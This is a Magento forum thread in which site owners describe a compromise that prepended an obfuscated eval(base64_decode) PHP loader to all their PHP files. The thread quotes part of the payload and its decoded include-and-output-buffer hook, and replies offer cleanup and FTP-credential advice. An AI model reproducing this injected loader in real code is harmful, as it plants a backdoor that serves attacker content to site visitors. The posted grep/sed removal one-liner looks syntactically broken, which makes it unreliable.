Magento Forum

Got hacked - they added a script on top of EVERY single PHP file on my server - please help! 

sportgirl

Total Posts:  3

My site got hacked .. please helppppp!!!

They added a script on top of all of my php files with the following:
<?php /**/eval(base64_decode(’aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydt ... (it goes on ...)

which says:
if(function_exists(’ob_start’)&&!isset($GLOBALS[’mfsn’])){$GLOBALS[’mfsn’]=’/shop/media/catalog/product/cache/8/thumbnail/120x/5e06319eda06f020e43594a9c230972d/images/catalog/product/placeholder/style.css.php’;if(file_exists($GLOBALS[’mfsn’])){include_once($GLOBALS[’mfsn’]);if(function_exists(’gml’)&&function;_exists(’dgobh’)){ob_start(’dgobh’);}}}

Luckily it’s the same code / string, so I should be able to run a search and replace for this string.

Do you know a UNIX command to replace this piece of code in multiple files?
How do I clean this piece of code?

I need help!

Magento Community Magento Community
Magento Community
Magento Community

Adam Moss

Total Posts:  248
Birmingham, UK

It may take a while but you can do a search and replace action in Dreamweaver if you download all the files first. It’s terribly unlucky that you’d get hacked in such a way, perhaps you should move everything to another server/database?

Magento Community
Magento Community

sportgirl

Total Posts:  3

Highwayman - 22 April 2010 10:38 PM

It may take a while but you can do a search and replace action in Dreamweaver if you download all the files first. It’s terribly unlucky that you’d get hacked in such a way, perhaps you should move everything to another server/database?

Thank you. It’s going to take a long time to do this since I have thousands of files.
How do I prevent this from happening again?

Magento Community
Magento Community

fr0x

Total Posts:  59

How do I prevent this from happening again?

Change your FTP login credentials immediately.  Don’t use an FTP program that stores your password for you (or, more to the point, don’t ever let a login application to your server store the login info...you should enter it manually every time).  Make sure your PC is clean of anything malicious.  I haven’t yet seen a case where Magento itself was “hacked” but rather it seems to always be the case where the ftp login credentials got comprimised.

Magento Community
Magento Community

wmike

Total Posts:  29

Same happened to my website yesterday. I’m on Bluehost and they tech support sucks. Before I find out what’s going on, the tech support guys (3 of them) were blaiming my Internet Explorer and advising to change to a different browser!!!
My attention caught the freshly modified index.php and when I opened it, right on the top was this additional code. Same as yours! Then I randomly checke few other .php files and looks like most of .php is infected.
My permissions are 755 and 644. Was that a reason that it was so easy to breach the security?
It is hard to believe that attack came from my ftp stored login. Last time I use it was about 5-6 month ago and my home PC is protected and scanned daily and on access.
Have you find an easy solution to fix it? I can’t imagine looking for each infection and editing it manually?

Magento Community
Magento Community

yaozer

Total Posts:  27
Shanghai

web hosting tech is often not good.

need a script to mass delete them.

comfort.

wmike - 07 May 2010 11:36 AM

Same happened to my website yesterday. I’m on Bluehost and they tech support sucks. Before I find out what’s going on, the tech support guys (3 of them) were blaiming my Internet Explorer and advising to change to a different browser!!!
My attention caught the freshly modified index.php and when I opened it, right on the top was this additional code. Same as yours! Then I randomly checke few other .php files and looks like most of .php is infected.
My permissions are 755 and 644. Was that a reason that it was so easy to breach the security?
It is hard to believe that attack came from my ftp stored login. Last time I use it was about 5-6 month ago and my home PC is protected and scanned daily and on access.
Have you find an easy solution to fix it? I can’t imagine looking for each infection and editing it manually?

Magento Community
Magento Community

SimpleHelixcom
Enthusiast

Total Posts:  906
Huntsville, AL

I know this is old, but here’s how to wipe out all instances of that script if they exist on one line:

IFS=$'\n';for i in ` grep <PART_OF_BAD_SCRIPT> * -lsr `; do sed -'/<PART_OF_BAD_SCRIPT>/ d' "$i"done

for example:

IFS=$'\n';for i in ` grep aWYoZnVuY3Rpb25f * -lsr `; do sed -'/aWYoZnVuY3Rpb25f/ d' "$i"done

Magento Community
Magento Community

louise100

Total Posts:  165
UK

hi,

Just out of interest, what version of magento got hacked? Has anyone shed any light on how this happened?
Is this a magento specific problem or a server security problem?

Louise

Magento Community
Magento Community
Magento Community
Magento Community